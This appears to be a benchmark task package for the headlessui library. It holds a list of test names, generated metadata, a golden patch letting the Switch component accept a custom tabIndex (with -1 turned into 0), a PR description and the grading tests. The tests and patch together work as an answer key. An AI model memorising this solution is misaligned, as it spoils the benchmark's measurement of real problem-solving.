no active listboxoption", "should be possible to close the listbox with Enter and choose the active listbox option", "should be possible to open the listbox with Space", "should not be possible to open the listbox with Space when the button is disabled", "should be possible to open the listbox with Space, and focus the selected option", "should focus the first non disabled listbox option when opening with Space", "should focus the first non disabled listbox option when opening with Space (jump over multiple disabled ones)", "should have no active listbox option upon Space key press, when there are no non-disabled listbox options", "should be possible to close the listbox with Space and choose the active listbox option", "should be possible to close an open listbox with Escape", "should focus trap when we use Tab", "should be possible to open the listbox with ArrowDown", "should not be possible to open the listbox with ArrowDown when the button is disabled", "should be possible to open the listbox with ArrowDown, and focus the selected option", "should be possible to use ArrowDown to navigate the listbox options", "should be possible to use ArrowDown to navigate the listbox options and skip the first disabled one", "should be possible to use ArrowDown to navigate the listbox options and jump to the first non-disabled one", "should be possible to use ArrowRight to navigate the listbox options", "should be possible to open the listbox with ArrowUp and the last option should be active", "should not be possible to open the listbox with ArrowUp and the last option should be active when the button is disabled", "should be possible to open the listbox with ArrowUp, and focus the selected option", "should be possible to use ArrowUp to navigate the listbox options and jump to the first non-disabled one", "should not be possible to navigate up or down if there is only a single non-disabled option", "should be possible to use ArrowUp to navigate the listbox options", "should 
be possible to use ArrowLeft to navigate the listbox options", "should be possible to use the End key to go to the last listbox option", "should be possible to use the End key to go to the last non disabled listbox option", "should be possible to use the End key to go to the first listbox option if that is the only non-disabled listbox option", "should have no active listbox option upon End key press, when there are no non-disabled listbox options", "should be possible to use the PageDown key to go to the last listbox option", "should be possible to use the PageDown key to go to the last non disabled listbox option", "should be possible to use the PageDown key to go to the first listbox option if that is the only non-disabled listbox option", "should have no active listbox option upon PageDown key press, when there are no non-disabled listbox options", "should be possible to use the Home key to go to the first listbox option", "should be possible to use the Home key to go to the first non disabled listbox option", "should be possible to use the Home key to go to the last listbox option if that is the only non-disabled listbox option", "should have no active listbox option upon Home key press, when there are no non-disabled listbox options", "should be possible to use the PageUp key to go to the first listbox option", "should be possible to use the PageUp key to go to the first non disabled listbox option", "should be possible to use the PageUp key to go to the last listbox option if that is the only non-disabled listbox option", "should have no active listbox option upon PageUp key press, when there are no non-disabled listbox options", "should not be possible to search for a disabled option", "should focus the ListboxButton when we click the ListboxLabel", "should not focus the ListboxButton when we right click the ListboxLabel", "should be possible to open the listbox on click", "should not be possible to open the listbox on right click", "should not be possible 
to open the listbox on click when the button is disabled", "should be possible to open the listbox on click, and focus the selected option", "should be possible to close a listbox on click", "should be a no-op when we click outside of a closed listbox", "should be possible to click outside of the listbox which should close the listbox", "should be possible to click outside of the listbox on another listbox button which should close the current listbox and open the new listbox", "should be possible to click outside of the listbox which should close the listbox (even if we press the listbox button)", "should be possible to hover an option and make it active", "should make a listbox option active when you move the mouse over it", "should be a no-op when we move the mouse and the listbox option is already active", "should be a no-op when we move the mouse and the listbox option is disabled", "should not be possible to hover an option that is disabled", "should be possible to mouse leave an option and make it inactive", "should be possible to mouse leave a disabled option and be a no-op", "should be possible to click a listbox option, which closes the listbox", "should be possible to click a disabled listbox option, which is a no-op", "should be possible focus a listbox option, so that it becomes active", "should not be possible to focus a listbox option which is disabled", "should be possible to pass multiple values to the Listbox component", "should make the first selected option the active item", "should keep the listbox open when selecting an item via the keyboard", "should toggle the selected state of an option when clicking on it", "should toggle the selected state of an option when clicking on it (using objects instead of primitives)", "should trigger the `change` when the tab changes", "should error when we are using a <TabList /> without a parent <TabGroup /> component", "should error when we are using a <Tab /> without a parent <TabGroup /> component", "should 
error when we are using a <TabPanels /> without a parent <TabGroup /> component", "should error when we are using a <TabPanel /> without a parent <TabGroup /> component", "should be possible to render TabGroup without crashing", "should be possible to render the TabPanels first, then the TabList", "should guarantee the order when injecting new tabs dynamically", "should guarantee the order of DOM nodes when reversing the tabs and panels themselves, then performing actions (controlled component)", "should guarantee the order of DOM nodes when reversing the tabs and panels themselves, then performing actions (uncontrolled component)", "should expose the `selectedIndex` on the `Tabs` component", "should expose the `selectedIndex` on the `TabList` component", "should expose the `selectedIndex` on the `TabPanels` component", "should expose the `selected` state on the `Tab` components", "should expose the `selected` state on the `TabPanel` components", "should jump to the nearest tab when the defaultIndex is out of bounds (-2)", "should jump to the nearest tab when the defaultIndex is out of bounds (+5)", "should jump to the next available tab when the defaultIndex is a disabled tab", "should jump to the next available tab when the defaultIndex is a disabled tab and wrap around", "should not change the Tab if the defaultIndex changes", "should select first tab if no tabs were provided originally", "should select first tab if no tabs were provided originally (with a defaultIndex of 1)", "should not change the tab in a controlled component if you do not respond to the @change", "should be possible to change active tab controlled and uncontrolled", "should jump to the nearest tab when the selectedIndex is out of bounds (-2)", "should jump to the nearest tab when the selectedIndex is out of bounds (+5)", "should jump to the next available tab when the selectedIndex is a disabled tab", "should jump to the next available tab when the selectedIndex is a disabled tab and wrap 
around", "should prefer selectedIndex over defaultIndex", "should wrap around when overflowing the index when using a controlled component", "should wrap around when underflowing the index when using a controlled component", "should be possible to tab to the default initial first tab", "should be possible to tab to the default index tab", "should be possible to go to the next item (activation = `auto`)", "should be possible to go to the next item (activation = `manual`)", "should wrap around at the end (activation = `auto`)", "should wrap around at the end (activation = `manual`)", "should not be possible to go right when in vertical mode (activation = `auto`)", "should not be possible to go right when in vertical mode (activation = `manual`)", "should be possible to go to the previous item (activation = `auto`)", "should be possible to go to the previous item (activation = `manual`)", "should wrap around at the beginning (activation = `auto`)", "should wrap around at the beginning (activation = `manual`)", "should not be possible to go left when in vertical mode (activation = `auto`)", "should not be possible to go left when in vertical mode (activation = `manual`)", "should not be possible to go down when in horizontal mode (activation = `auto`)", "should not be possible to go down when in horizontal mode (activation = `manual`)", "should be possible to go to the first focusable item (activation = `auto`)", "should be possible to go to the first focusable item (activation = `manual`)", "should be possible to activate the focused tab", "should be possible to click on a tab to focus it", "should be a no-op when clicking on a disabled tab", "should be possible to go to the next item containing a Dialog component", "should trigger the `onChange` when the tab changes", "should error when we are using a <Tab.List /> without a parent <Tab.Group /> component", "should error when we are using a <Tab /> without a parent <Tab.Group /> component", "should error when we are 
using a <Tab.Panels /> without a parent <Tab.Group /> component", "should error when we are using a <Tab.Panel /> without a parent <Tab.Group /> component", "should be possible to render Tab.Group without crashing", "should be possible to render the Tab.Panels first, then the Tab.List", "should be possible to render using as={Fragment}", "should be possible to render using multiple as={Fragment}", "should expose the `selectedIndex` on the `Tab.Group` component", "should expose the `selectedIndex` on the `Tab.List` component", "should expose the `selectedIndex` on the `Tab.Panels` component", "should expose the `selected` state on the `Tab.Panel` components", "should not change the tab in a controlled component if you do not respond to the onChange", "should not steal the ref from the child", "should render without crashing", "should be possible to render a Transition without children", "should yell at us when we forget the required show prop", "should render a div and its children by default", "should passthrough all the props (that we do not use internally)", "should render another component if the `as` prop is used and its children by default", "should passthrough all the props (that we do not use internally) even when using an `as` prop", "should render nothing when the show prop is false", "should be possible to change the underlying DOM tag", "should be possible to use a render prop", "should yell at us when we forget to forward the ref when using a render prop", "should yell at us when we forget to wrap the `<Transition.Child />` in a parent <Transition /> component", "should be possible to render a Transition.Child without children", "should be possible to use a Transition.Root and a Transition.Child", "should be possible to nest transition components", "should be possible to change the underlying DOM tag of the Transition.Child components", "should be possible to change the underlying DOM tag of the Transition component and Transition.Child components", 
"should be possible to use render props on the Transition.Child components", "should be possible to use render props on the Transition and Transition.Child components", "should yell at us when we forgot to forward the ref on one of the Transition.Child components", "should yell at us when we forgot to forward a ref on the Transition component", "should support new lines in class lists", "should be possible to passthrough the transition classes", "should be possible to passthrough the transition classes and immediately apply the enter transitions when appear is set to true", "should fire events in the correct order", "should fire only one event for a given component change", "should error when we are using a <Listbox.Button /> without a parent <Listbox />", "should error when we are using a <Listbox.Label /> without a parent <Listbox />", "should error when we are using a <Listbox.Options /> without a parent <Listbox />", "should error when we are using a <Listbox.Option /> without a parent <Listbox />", "should be possible to render a Listbox.Label using a render prop", "should be possible to render a Listbox.Label using a render prop and an `as` prop", "should be possible to render a Listbox.Button using a render prop", "should be possible to render a Listbox.Button using a render prop and an `as` prop", "should be possible to render a Listbox.Button and a Listbox.Label and see them linked together", "should be possible to render Listbox.Options using a render prop", "should be possible to always render the Listbox.Options if we provide it a `static` prop", "should be possible to use a different render strategy for the Listbox.Options", "should be possible to render a Listbox.Option using a render prop", "should be possible to wrap the Listbox.Options with a Transition component", "should focus the Listbox.Button when we click the Listbox.Label", "should not focus the Listbox.Button when we right click the Listbox.Label", "should be possible to click outside of 
the listbox, on an element which is within a focusable element, which closes the listbox", "should yell at us when we forget to wrap the `<TransitionChild />` in a parent <Transition /> component", "should be possible to render a TransitionChild without children", "should be possible to change the underlying DOM tag of the TransitionChild components", "should be possible to change the underlying DOM tag of the Transition component and TransitionChild components", "should be possible to use render props on the TransitionChild components", "should be possible to use render props on the Transition and TransitionChild components", "should yell at us when we forgot to forward the ref on one of the TransitionChild components", "should transition in completely (duration defined in milliseconds)", "should transition in completely (duration defined in seconds)", "should transition in completely", "should transition out completely", "should transition out completely (render strategy = hidden)", "should not unmount the whole tree when some children are still transitioning", "should fire events for all the stages", "should error when we are using a <ComboboxButton /> without a parent <Combobox />", "should error when we are using a <ComboboxLabel /> without a parent <Combobox />", "should error when we are using a <ComboboxOptions /> without a parent <Combobox />", "should error when we are using a <ComboboxOption /> without a parent <Combobox />", "should be possible to render a Combobox without crashing", "should guarantee the order of options based on `order` when performing actions", "should be possible to render a Combobox using a render prop", "should be possible to disable a Combobox", "should not crash when a defaultValue is not given", "should close the Combobox when the input is blurred", "selecting an option puts the value into Combobox.Input when displayValue is not provided", "selecting an option puts the display value into Combobox.Input when displayValue is 
provided", "selecting an option puts the display value into Combobox.Input when displayValue is provided (when v-model is undefined)", "conditionally rendering the input should allow changing the display value", "should be possible to override the `type` on the input", "should move the caret to the end of the input when syncing the value", "should be possible to render a ComboboxLabel using a render prop", "should be possible to link Input/Button and Label if Label is rendered last", "should be possible to render a ComboboxLabel using a render prop and an `as` prop", "should be possible to render a ComboboxButton using a render prop", "should be possible to render a ComboboxButton using a render prop and an `as` prop", "should be possible to render a ComboboxButton and a ComboboxLabel and see them linked together", "should be possible to render ComboboxOptions using a render prop", "should be possible to always render the ComboboxOptions if we provide it a `static` prop", "should be possible to use a different render strategy for the ComboboxOptions", "should be possible to render a ComboboxOption using a render prop", "should be possible to swap the Combobox option with a button for example", "should mark all the elements between Combobox.Options and Combobox.Option with role none", "should always open the ComboboxOptions because of a wrapping OpenClosed component", "should always close the ComboboxOptions because of a wrapping OpenClosed component", "should sync the active index properly", "should be possible to open the Combobox with Enter", "should not be possible to open the combobox with Enter when the button is disabled", "should be possible to open the combobox with Enter, and focus the selected option", "should be possible to open the combobox with Enter, and focus the selected option (when using the `hidden` render strategy)", "should be possible to open the combobox with Enter, and focus the selected option (with a list of objects)", "should have no 
active combobox option when there are no combobox options at all", "should be possible to open the combobox with Space", "should not be possible to open the combobox with Space when the button is disabled", "should be possible to open the combobox with Space, and focus the selected option", "should have no active combobox option upon Space key press, when there are no non-disabled combobox options", "should be possible to close an open combobox with Escape", "should not propagate the Escape event when the combobox is open", "should propagate the Escape event when the combobox is closed", "should be possible to open the combobox with ArrowDown", "should not be possible to open the combobox with ArrowDown when the button is disabled", "should be possible to open the combobox with ArrowDown, and focus the selected option", "should be possible to open the combobox with ArrowUp and the last option should be active", "should not be possible to open the combobox with ArrowUp and the last option should be active when the button is disabled", "should be possible to open the combobox with ArrowUp, and focus the selected option", "should be possible to use ArrowUp to navigate the combobox options and jump to the first non-disabled one", "should be possible to close the combobox with Enter and choose the active combobox option", "pressing Tab should select the active item and move to the next DOM node", "pressing Shift+Tab should select the active item and move to the previous DOM node", "should bubble escape when using `static` on Combobox.Options", "should bubble escape when not using Combobox.Options at all", "should sync the input field correctly and reset it when pressing Escape", "should be possible to use ArrowDown to navigate the combobox options", "should be possible to use ArrowDown to navigate the combobox options and skip the first disabled one", "should be possible to use ArrowDown to navigate the combobox options and jump to the first non-disabled one", "should 
be possible to go to the next item if no value is set", "should be possible to use ArrowUp to navigate the combobox options", "should be possible to use the End key to go to the last combobox option", "should be possible to use the End key to go to the last non disabled combobox option", "should be possible to use the End key to go to the first combobox option if that is the only non-disabled combobox option", "should have no active combobox option upon End key press, when there are no non-disabled combobox options", "should be possible to use the PageDown key to go to the last combobox option", "should be possible to use the PageDown key to go to the last non disabled Combobox option", "should be possible to use the PageDown key to go to the first combobox option if that is the only non-disabled combobox option", "should have no active combobox option upon PageDown key press, when there are no non-disabled combobox options", "should be possible to use the Home key to go to the first combobox option", "should be possible to use the Home key to go to the first non disabled combobox option", "should be possible to use the Home key to go to the last combobox option if that is the only non-disabled combobox option", "should have no active combobox option upon Home key press, when there are no non-disabled combobox options", "should be possible to use the PageUp key to go to the first combobox option", "should be possible to use the PageUp key to go to the first non disabled combobox option", "should be possible to use the PageUp key to go to the last combobox option if that is the only non-disabled combobox option", "should have no active combobox option upon PageUp key press, when there are no non-disabled combobox options", "should reset the value when the last character is removed, when in `nullable` mode", "should not be possible to search and activate a disabled option", "should maintain activeIndex and activeOption when filtering", "should focus the 
ComboboxButton when we click the ComboboxLabel", "should not focus the ComboboxInput when we right click the ComboboxLabel", "should be possible to open the combobox by focusing the input with immediate mode enabled", "should not be possible to open the combobox by focusing the input with immediate mode disabled", "should not be possible to open the combobox by focusing the input with immediate mode enabled when button is disabled", "should be possible to close a combobox on click with immediate mode enabled", "should be possible to close a focused combobox on click with immediate mode enabled", "should be possible to open the combobox on click", "should not be possible to open the combobox on right click", "should not be possible to open the combobox on click when the button is disabled", "should be possible to open the combobox on click, and focus the selected option", "should be possible to close a combobox on click", "should be a no-op when we click outside of a closed combobox", "should be possible to click outside of the combobox on another combobox button which should close the current combobox and open the new combobox", "should be possible to click outside of the combobox which should close the combobox (even if we press the combobox button)", "should be possible to click outside of the combobox, on an element which is within a focusable element, which closes the combobox", "should be possible to hover an option and make it active when using `static`", "should make a combobox option active when you move the mouse over it", "should be a no-op when we move the mouse and the combobox option is already active", "should be a no-op when we move the mouse and the combobox option is disabled", "should be possible to click a combobox option, which closes the combobox", "should be possible to click a combobox option, which closes the combobox with immediate mode enabled", "should be possible to click a disabled combobox option, which is a no-op", "should be possible 
focus a combobox option, so that it becomes active", "should not be possible to focus a combobox option which is disabled", "should be possible to hold the last active option", "should sync the input field correctly and reset it when resetting the value from outside (to null)", "should sync the input field correctly and reset it when resetting the value from outside (to undefined)", "should sync the input field correctly and reset it when resetting the value from outside (when using displayValue)", "should be possible to pass multiple values to the Combobox component", "should keep the combobox open when selecting an item via the keyboard", "should reset the active option, if the active option gets unmounted", "should error when we are using a <Combobox.Button /> without a parent <Combobox />", "should error when we are using a <Combobox.Label /> without a parent <Combobox />", "should error when we are using a <Combobox.Options /> without a parent <Combobox />", "should error when we are using a <Combobox.Option /> without a parent <Combobox />", "selecting an option puts the display value into Combobox.Input when displayValue is provided (when value is undefined)", "should be possible to render a Combobox.Label using a render prop", "should be possible to render a Combobox.Label using a render prop and an `as` prop", "should be possible to render a Combobox.Button using a render prop", "should be possible to render a Combobox.Button using a render prop and an `as` prop", "should be possible to render a Combobox.Button and a Combobox.Label and see them linked together", "should be possible to render Combobox.Options using a render prop", "should be possible to always render the Combobox.Options if we provide it a `static` prop", "should be possible to use a different render strategy for the Combobox.Options", "should be possible to render a Combobox.Option using a render prop", "should be possible to wrap the Combobox.Options with a Transition component", "should 
be possible to open the combobox with Enter", "should be possible to use the PageDown key to go to the last non disabled combobox option", "should focus the Combobox.Input when we click the Combobox.Label", "should not focus the Combobox.Input when we right click the Combobox.Label", "should warn when changing the combobox from uncontrolled to controlled", "should warn when changing the combobox from controlled to uncontrolled" ]
Function: Field(props: { disabled?: boolean, children?: React.ReactNode | ((slot: { disabled: boolean }) => React.ReactNode) }) Location: packages/@headlessui-react/src/components/field/field.tsx Inputs: - **disabled** (optional boolean): controls the disabled state of the field. - **children** (ReactNode | function): either static JSX or a render‑prop function that receives a **slot** object `{ disabled: boolean }`. Outputs: Renders the field’s children (or the result of invoking the render‑prop) wrapped in `<FormFieldsProvider>`, propagating the current `disabled` flag via the slot parameter. When a render‑prop is used, the function is called with `{ disabled }` reflecting the field’s disabled state. Description: The `<Field>` component now supports a render‑prop children signature, allowing callers to customize rendering based on the field’s disabled state (e.g., `<Field>{({ disabled }) => <input disabled={disabled} />}</Field>`).
MIT
{ "base_image_name": "node_20", "install": [ "npm ci --prefer-offline --no-audit --progress=false" ], "log_parser": "parse_log_js_4", "test_cmd": "npm test -- --verbose --no-colors" }
{ "num_modified_files": 2, "num_modified_lines": 8, "pr_author": "RobinMalfait", "pr_labels": [], "llm_metadata": { "code": "A", "code_quality": null, "confidence": 0.97, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "medium", "external_urls": [], "intent_completeness": "complete", "patch": null, "pr_categories": [ "core_feat" ], "reason": null, "reasoning": "The issue requests that the Field component accept a render‑prop children function and expose the disabled slot. The added test verifies exactly this behavior, and the golden patch implements the necessary conditional handling of function children. The specification is complete, the test matches the requirement, and there are no signs of test‑suite coupling, implicit naming, external dependencies, ambiguous specs, unrelated patch artifacts, or hidden domain knowledge.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, 
"test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
da94b80860703d3c25c17631eaf84435821e7088
2024-02-03 16:18:36
vercel[bot]: [vc]: #62L27VL5fhxoxrpYowr4T76pFVp3yVeONxx5DJmVItA=:eyJpc01vbm9yZXBvIjp0cnVlLCJ0eXBlIjoiZ2l0aHViIiwicHJvamVjdHMiOlt7Im5hbWUiOiJoZWFkbGVzc3VpLXZ1ZSIsInJvb3REaXJlY3RvcnkiOiJwbGF5Z3JvdW5kcy92dWUiLCJpbnNwZWN0b3JVcmwiOiJodHRwczovL3ZlcmNlbC5jb20vdGFpbHdpbmRsYWJzL2hlYWRsZXNzdWktdnVlL0cyemZ0TjdnN0Q1c3RQTHppU2tmTlFTaFg2QUwiLCJwcmV2aWV3VXJsIjoiaGVhZGxlc3N1aS12dWUtZ2l0LWZpeC1pc3N1ZS0yOTE1LXRhaWx3aW5kbGFicy52ZXJjZWwuYXBwIiwibmV4dENvbW1pdFN0YXR1cyI6IlBFTkRJTkciLCJsaXZlRmVlZGJhY2siOnsicmVzb2x2ZWQiOjAsInVucmVzb2x2ZWQiOjAsInRvdGFsIjowLCJsaW5rIjoiaGVhZGxlc3N1aS12dWUtZ2l0LWZpeC1pc3N1ZS0yOTE1LXRhaWx3aW5kbGFicy52ZXJjZWwuYXBwIn19XX0= **The latest updates on your projects**. Learn more about [Vercel for Git ↗︎](https://vercel.link/github-learn-more) | Name | Status | Preview | Comments | Updated (UTC) | | :--- | :----- | :------ | :------- | :------ | | **headlessui-vue** | 🔄 Building ([Inspect](https://vercel.com/tailwindlabs/headlessui-vue/G2zftN7g7D5stPLziSkfNQShX6AL)) | [Visit Preview](https://vercel.live/open-feedback/headlessui-vue-git-fix-issue-2915-tailwindlabs.vercel.app?via=pr-comment-visit-preview-link&passThrough=1) | 💬 [**Add feedback**](https://vercel.live/open-feedback/headlessui-vue-git-fix-issue-2915-tailwindlabs.vercel.app?via=pr-comment-feedback-link) | Feb 3, 2024 4:18pm |
tailwindlabs__headlessui-2966
diff --git a/packages/@headlessui-react/CHANGELOG.md b/packages/@headlessui-react/CHANGELOG.md index 61c0898..3908d51 100644 --- a/packages/@headlessui-react/CHANGELOG.md +++ b/packages/@headlessui-react/CHANGELOG.md @@ -15,6 +15,7 @@ and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0 - Ensure `children` prop of `Field` component can be a render prop ([#2941](https://github.com/tailwindlabs/headlessui/pull/2941)) - Add `hidden` attribute to internal `<Hidden />` component when the `Features.Hidden` feature is used ([#2955](https://github.com/tailwindlabs/headlessui/pull/2955)) - Attempt form submission when pressing `Enter` on `Checkbox` component ([#2962](https://github.com/tailwindlabs/headlessui/pull/2962)) +- Allow setting custom `tabIndex` on the `<Switch />` component ([#2966](https://github.com/tailwindlabs/headlessui/pull/2966)) ## [2.0.0-alpha.4] - 2024-01-03 diff --git a/packages/@headlessui-react/src/components/switch/switch.tsx b/packages/@headlessui-react/src/components/switch/switch.tsx index 3adb57b..76a4ab8 100644 --- a/packages/@headlessui-react/src/components/switch/switch.tsx +++ b/packages/@headlessui-react/src/components/switch/switch.tsx @@ -116,12 +116,7 @@ type SwitchRenderPropArg = { changing: boolean disabled: boolean } -type SwitchPropsWeControl = - | 'aria-checked' - | 'aria-describedby' - | 'aria-labelledby' - | 'role' - | 'tabIndex' +type SwitchPropsWeControl = 'aria-checked' | 'aria-describedby' | 'aria-labelledby' | 'role' export type SwitchProps<TTag extends ElementType = typeof DEFAULT_SWITCH_TAG> = Props< TTag, @@ -136,6 +131,7 @@ export type SwitchProps<TTag extends ElementType = typeof DEFAULT_SWITCH_TAG> = form?: string autoFocus?: boolean disabled?: boolean + tabIndex?: number } > @@ -220,7 +216,7 @@ function SwitchFn<TTag extends ElementType = typeof DEFAULT_SWITCH_TAG>( ref: switchRef, role: 'switch', type: useResolveButtonType(props, internalSwitchRef), - tabIndex: 0, + tabIndex: props.tabIndex 
=== -1 ? 0 : props.tabIndex ?? 0, 'aria-checked': checked, 'aria-labelledby': labelledBy, 'aria-describedby': describedBy, diff --git a/packages/@headlessui-vue/CHANGELOG.md b/packages/@headlessui-vue/CHANGELOG.md index bbcd06e..a778aa6 100644 --- a/packages/@headlessui-vue/CHANGELOG.md +++ b/packages/@headlessui-vue/CHANGELOG.md @@ -18,6 +18,7 @@ and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0 - Prevent default behaviour when clicking outside of a `DialogPanel` ([#2919](https://github.com/tailwindlabs/headlessui/pull/2919)) - Don’t override explicit `disabled` prop for components inside `<MenuItem>` ([#2929](https://github.com/tailwindlabs/headlessui/pull/2929)) - Add `hidden` attribute to internal `<Hidden />` component when the `Features.Hidden` feature is used ([#2955](https://github.com/tailwindlabs/headlessui/pull/2955)) +- Allow setting custom `tabIndex` on the `<Switch />` component ([#2966](https://github.com/tailwindlabs/headlessui/pull/2966)) ## [1.7.17] - 2024-01-08 diff --git a/packages/@headlessui-vue/src/components/switch/switch.ts b/packages/@headlessui-vue/src/components/switch/switch.ts index cd10354..4746dee 100644 --- a/packages/@headlessui-vue/src/components/switch/switch.ts +++ b/packages/@headlessui-vue/src/components/switch/switch.ts @@ -78,6 +78,7 @@ export let Switch = defineComponent({ name: { type: String, optional: true }, value: { type: String, optional: true }, id: { type: String, default: () => `headlessui-switch-${useId()}` }, + tabIndex: { type: Number, default: 0 }, }, inheritAttrs: false, setup(props, { emit, attrs, slots, expose }) { @@ -143,14 +144,14 @@ export let Switch = defineComponent({ }) return () => { - let { id, name, value, form, ...theirProps } = props + let { id, name, value, form, tabIndex, ...theirProps } = props let slot = { checked: checked.value } let ourProps = { id, ref: switchRef, role: 'switch', type: type.value, - tabIndex: 0, + tabIndex: tabIndex === -1 ? 
0 : tabIndex, 'aria-checked': checked.value, 'aria-labelledby': api?.labelledby.value, 'aria-describedby': api?.describedby.value,
Allow setting custom `tabIndex` on the `<Switch />` component This PR allows overriding the `tabIndex` of the `<Switch />` component if you need to change the tab index. However, we still need it to be focusable using the keyboard so we will always fallback to `0` even if `-1` was pased. Fixes: #2915
**Title** Expose a customizable `tabIndex` prop for the `<Switch />` component while preserving keyboard focusability. **Problem** The switch component always forced a `tabIndex` of 0, preventing developers from providing their own tab order. At the same time, it needed to stay focusable via the keyboard. **Root Cause** `tabIndex` was hard‑coded and listed among the internally controlled props, so any user‑supplied value was ignored. **Fix / Expected Behavior** - Introduce an optional `tabIndex` property that users can set. - Default the value to 0 when none is provided. - If a user passes `-1`, automatically treat it as 0 to keep the element focusable. - Remove `tabIndex` from the list of internally controlled props so that custom values are respected. - Update documentation/changelog to reflect the new capability. **Risk & Validation** - Verify that the switch remains reachable via keyboard navigation for all `tabIndex` values, especially when `-1` is supplied. - Run the component’s accessibility and interaction test suite to ensure no regressions. - Confirm that the addition does not interfere with other props or break existing usage patterns.
2,966
tailwindlabs/headlessui
diff --git a/packages/@headlessui-react/src/components/switch/switch.test.tsx b/packages/@headlessui-react/src/components/switch/switch.test.tsx index c65ddf5..b6988f2 100644 --- a/packages/@headlessui-react/src/components/switch/switch.test.tsx +++ b/packages/@headlessui-react/src/components/switch/switch.test.tsx @@ -59,6 +59,47 @@ describe('Rendering', () => { assertSwitch({ state: SwitchState.Off, label: 'Enable notifications' }) }) + describe('`tabIndex` attribute', () => { + it('should have a default tabIndex of `0`', () => { + render( + <Switch checked={false} onChange={console.log}> + <span>Enable notifications</span> + </Switch> + ) + assertSwitch({ + state: SwitchState.Off, + label: 'Enable notifications', + attributes: { tabindex: '0' }, + }) + }) + + it('should be possible to override the `tabIndex`', () => { + render( + <Switch checked={false} onChange={console.log} tabIndex={3}> + <span>Enable notifications</span> + </Switch> + ) + assertSwitch({ + state: SwitchState.Off, + label: 'Enable notifications', + attributes: { tabindex: '3' }, + }) + }) + + it('should not be possible to override the `tabIndex` to `-1`', () => { + render( + <Switch checked={false} onChange={console.log} tabIndex={-1}> + <span>Enable notifications</span> + </Switch> + ) + assertSwitch({ + state: SwitchState.Off, + label: 'Enable notifications', + attributes: { tabindex: '0' }, + }) + }) + }) + describe('`type` attribute', () => { it('should set the `type` to "button" by default', async () => { render( diff --git a/packages/@headlessui-react/src/test-utils/accessibility-assertions.ts b/packages/@headlessui-react/src/test-utils/accessibility-assertions.ts index 1b7beff..cf30183 100644 --- a/packages/@headlessui-react/src/test-utils/accessibility-assertions.ts +++ b/packages/@headlessui-react/src/test-utils/accessibility-assertions.ts @@ -1145,6 +1145,7 @@ export function assertSwitch( textContent?: string label?: string description?: string + attributes?: Record<string, string | 
null> }, switchElement = getSwitch() ) { @@ -1152,7 +1153,8 @@ export function assertSwitch( if (switchElement === null) return expect(switchElement).not.toBe(null) expect(switchElement).toHaveAttribute('role', 'switch') - expect(switchElement).toHaveAttribute('tabindex', '0') + let tabIndex = Number(switchElement.getAttribute('tabindex') ?? '0') + expect(tabIndex).toBeGreaterThanOrEqual(0) if (options.textContent) { expect(switchElement).toHaveTextContent(options.textContent) @@ -1182,6 +1184,11 @@ export function assertSwitch( default: assertNever(options.state) } + + // Ensure disclosure button has the following attributes + for (let attributeName in options.attributes) { + expect(switchElement).toHaveAttribute(attributeName, options.attributes[attributeName]) + } } catch (err) { if (err instanceof Error) Error.captureStackTrace(err, assertSwitch) throw err diff --git a/packages/@headlessui-vue/src/components/switch/switch.test.tsx b/packages/@headlessui-vue/src/components/switch/switch.test.tsx index 0b6c510..c4008b4 100644 --- a/packages/@headlessui-vue/src/components/switch/switch.test.tsx +++ b/packages/@headlessui-vue/src/components/switch/switch.test.tsx @@ -327,6 +327,38 @@ describe('Rendering', () => { expect(handleChange).toHaveBeenNthCalledWith(3, true) }) }) + + describe('`tabIndex` attribute', () => { + it('should have a default tabIndex of `0`', () => { + renderTemplate(html`<Switch :checked="false" :tabIndex="0">Enable notifications</Switch>`) + + assertSwitch({ + state: SwitchState.Off, + label: 'Enable notifications', + attributes: { tabindex: '0' }, + }) + }) + + it('should be possible to override the `tabIndex`', () => { + renderTemplate(html`<Switch :checked="false" :tabIndex="3">Enable notifications</Switch>`) + + assertSwitch({ + state: SwitchState.Off, + label: 'Enable notifications', + attributes: { tabindex: '3' }, + }) + }) + + it('should not be possible to override the `tabIndex` to `-1`', () => { + renderTemplate(html`<Switch 
:checked="false" :tabIndex="-1">Enable notifications</Switch>`) + + assertSwitch({ + state: SwitchState.Off, + label: 'Enable notifications', + attributes: { tabindex: '0' }, + }) + }) + }) }) describe('Render composition', () => { diff --git a/packages/@headlessui-vue/src/test-utils/accessibility-assertions.ts b/packages/@headlessui-vue/src/test-utils/accessibility-assertions.ts index 2c7bbd1..5d59ed8 100644 --- a/packages/@headlessui-vue/src/test-utils/accessibility-assertions.ts +++ b/packages/@headlessui-vue/src/test-utils/accessibility-assertions.ts @@ -978,6 +978,7 @@ export function assertSwitch( textContent?: string label?: string description?: string + attributes?: Record<string, string | null> }, switchElement = getSwitch() ) { @@ -985,7 +986,8 @@ export function assertSwitch( if (switchElement === null) return expect(switchElement).not.toBe(null) expect(switchElement).toHaveAttribute('role', 'switch') - expect(switchElement).toHaveAttribute('tabindex', '0') + let tabIndex = Number(switchElement.getAttribute('tabindex') ?? '0') + expect(tabIndex).toBeGreaterThanOrEqual(0) if (options.textContent) { expect(switchElement).toHaveTextContent(options.textContent) @@ -1015,6 +1017,11 @@ export function assertSwitch( default: assertNever(options.state) } + + // Ensure disclosure button has the following attributes + for (let attributeName in options.attributes) { + expect(switchElement).toHaveAttribute(attributeName, options.attributes[attributeName]) + } } catch (err) { if (err instanceof Error) Error.captureStackTrace(err, assertSwitch) throw err
